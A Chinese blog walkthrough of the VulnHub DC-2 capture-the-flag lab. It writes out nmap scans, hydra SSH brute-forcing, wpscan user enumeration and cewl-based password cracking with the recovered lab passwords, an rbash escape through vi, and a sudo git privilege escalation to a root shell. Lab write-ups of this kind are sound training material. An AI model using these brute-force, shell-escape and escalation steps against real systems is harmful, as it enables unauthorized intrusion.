vulnhub-dc-2

最新推荐文章于 2024-08-24 08:42:08 发布
最新推荐文章于 2024-08-24 08:42:08 发布
阅读量255 收藏
点赞数 2
分类专栏: vulnhub 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45414878/article/details/106487023
版权

vulnhub-dc-2

vulnhub第三个靶机

靶机地址:链接: https://www.vulnhub.com/entry/dc-2,311/.

知识点

nmap

使用nmap扫描局域网内存活的主机,发现靶机ip

nmap 192.168.88.0/24 -T4

在这里插入图片描述
用nmap对其进行更详细的探测,发现开放了

端口服务
80http
7744ssh

在这里插入图片描述
端口:7744——>爆破——>失败

hydra -l root -P rockyou.txt 192.168.88.138 ssh -t 4 -s 7744

在这里插入图片描述

wordpress

端口:80——>web漏洞——>成功

访问80端口发现不能连接到该网站,需要设置一下hosts文件,便可访问

在这里插入图片描述
在右下方发现第一个flag,并且需要用到工具 cewl.(kali自带)

在这里插入图片描述
指纹识别为wordpress,该CMS为一款比较知名的博客CMS。对于该CMS,kali有自带的扫描工具wpscan.

whatweb http://dc-2

在这里插入图片描述
枚举用户,发现三个用户admin、jerry、tom

wpscan --url http://dc-2 -e u

在这里插入图片描述
编写帐号文件

在这里插入图片描述

用cewl生成密码字典

cewl http://dc-2/ -w dc2.txt

在这里插入图片描述
wpscan爆破wordpress后台,成功得到两对帐号密码

Username: jerry, Password: adipiscing
Username: tom, Password: parturient

wpscan --url http://dc-2 -U dc2user.txt -P dc2.txt

在这里插入图片描述

wordpress的默认后台地址:url+wp-login.php

用tom用户登录没发现可利用的地方,但用jerry用户登录发现了第二个flag,要寻找另一个切入点。

在这里插入图片描述

rbash绕过

试着用得到帐号密码登录主机,发现jerry用户没权限登录,但是tom可以登录

在这里插入图片描述
在tom的家目录发现了第三个flag,但是因为shell不完整查看不了。这时候需要绕过 rbash.

在这里插入图片描述

经过多次试验,发现vi命令可以用,也读取到了第三个flag

vi 1
:set shell =/bin/sh(执行完第一个再执行第二个)
:shell
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin (设置环境变量)

在这里插入图片描述
根据提示查看主机的用户,发现也存在jerry这个用户,试着用前面的密码登录,发现登录成功

su jerry

在这里插入图片描述

sudo提权之git

在jerry用户的家目录下发现第四个flag,根据提示应该是要git提权

在这里插入图片描述
发现jerry用户可以不用密码执行git命令,百度了下git 提权.,git -p 分页显示命令手册,会调用more这个命令,more这个命令是可以执行sh的

sudo -l  
sudo git -p help config
!/bin/sh

在这里插入图片描述
至此5个lag全部拿到

ps:

个人站点博客:XingHe,欢迎来踩~

XingHe_0
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub DC Challenges之 DC-2
ST0new的博客
05-26 1927
前言 关于Vulnhub 以及DC,以及如何使用ova安装,我已经在DC-1中介绍了 ,今天带来第二弹,比第一弹难度稍微大一点,重点还是考察工具的使用和命令的熟练程度 附上链接Vulnhub DC Challenges之 DC-1 DC-2介绍 DC-2,我们主要是从web入手渗透拿到flag,需要大家对信息收集要有一定的了解,需要掌握的工具:nmap,hydra,cewl。 靶机环境 DC-2...
Vulnhub-DC-2
06-05 872
因为提示到爆破,想到专门扫描wordpress的工具wpscan,先爆破用户名,再用cewl生成密码登录。这里提到了cewl,是一个字典生成攻击,所以我们考虑爆破密码。在hosts文件中增加192.168.20.135 dc-2。拿到用户名和密码,如果没扫用户名要指定-U 用户名。靶机IP:192.168.20.135。想到刚才敏感目录wp-admin访问。进到了wordpress的登陆界面。发现开放了80和7744端口。访问前端界面,发现存在重定向。扫描靶机端口及服务版本。在界面中看到flag。
Vulnhub - DC-1
qq_46081990的博客
03-14 389
Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。
vulnhub--DC2
weixin_55129870的博客
05-12 1292
环境:kali、DC2靶机 DC2靶机默认桥接模式,开启前改成net模式,保证kali和DC2在同一局域网中。(也可都是桥接模式,我比较习惯net模式) ifconfig查看kaliIP地址:192.168.44.131 查看C段,准备C段扫描,在虚拟机编辑--虚拟网络编辑器中, 得知网段192.168.44.0/24,使用nmap扫描存活主机 nmap -sP 192.168.44.0/24 #扫描IP段的所有IP地址 一般都会扫描出5个存活主机,出去较大的,较小的,得知.
vulnhub--DC5
weixin_55129870的博客
05-19 325
kali ip :192.168.44.131 主机发现 nmap -sP 192.168.44.0/24 DC-5 IP:192.168.44.145 端口探测 nmap -A -p1-65535 -T4 192.168.44.145 发现有一个80端口和111端口并且运行着rpcinfo服务,44040 访问http服务 发现留言板 提交XSS没有反应,但是提交时,底部时间会刷新变化 dirsearch 扫描 dirsearch是一个基于pyth...
Vulnhub-DC-2实战靶场
ierciyuan的博客
10-27 1601
vulnhubdc-2靶场。信息收集、漏洞利用等,详细的分步打靶。
vulnhub-DC-2
zzf011900的博客
01-31 401
账户 发现并没有什么可用的信息,这里给的提示感觉也没啥可以利用的信息了,换一个思路 看看还有没有别的端口。再次使用nmap 扫所有的端口 发现了一个。但是在flag4.txt 中提示我们使用git 提权!根据刚刚的提示他应该让我们切换杰瑞用户,还是没有权限。已经是root权限啦!查看最后一个flag。那么既然我们有了密码 我们还需要知道用户名使用。新建一个字典放这三个用户准备爆破。就是登入的后台 直接访问 发现是。找到flag1 他提示我们使用。工具(一个字典生成工具)发现了三个用户 分别。
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 2539
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
Vulnhub-DC-2渗透学习
m0_61996125的博客
06-11 717
​环境搭建 攻击机:Kali-2021.3:192.168.8.105 靶机:Vulnhub-DC2:192.168.8.222 靶机下载地址:https://download.vulnhub.com/dc/DC-2.zip ​
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
结合量子技术解决数据传输安全
编程之道在明明德在亲民在止于至善
08-22 1220
结合量子技术解决数据传输安全
第2章-05-接口API与安全签名算法
最新发布
黑夜开发者的博客
08-24 168
API(Application Programming Interface,应用程序编程接口)接口是一种定义了软件应用程序之间通信方式的协议或规范。它允许不同的软件应用程序之间进行数据交换和功能调用,而无需了解对方内部的具体实现细节。简而言之,API接口是软件之间的桥梁,使得不同的系统或服务能够相互连接和交互。
msxml*.dll 错误 ‘80072f7d‘ 安全频道支持出错 解决方案
编程路
08-22 402
msxml6.dll错误 '80072f7d'安全频道支持出错,用 SSLTools.exe 修复的方法无效!x更换了所有版本的 ("Msxml2.ServerXMLHTTP.6.0") '("WinHttp.WinHttpRequest.5.1") 都是报这个错误,而用老的 '("Microsoft.XMLHTTP") 则卡顿更严重直接没有返回任何错误信息。
独立ip为何高级又安全
Together_GPT的博客
08-22 328
独立IP,也称为静态IP,是指由网络服务商直接分配给用户的一个独立的IP地址,该IP地址不会因用户关机、重启或断开网络而发生改变。1. 防止IP被封锁:在使用共享IP时,如果其中一个用户因违反规定或被举报而被封锁IP,其他用户也可能会受到影响。3. 隐藏真实IP地址:使用独立IP可以更好地保护用户的隐私和安全,因为用户可以通过代理服务器或VPN等手段使用独立IP进行上网,隐藏自己的真实IP地址,防止被黑客攻击或被追踪。搜索引擎会认为拥有独立IP的网站更可靠,更容易被收录和排名。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值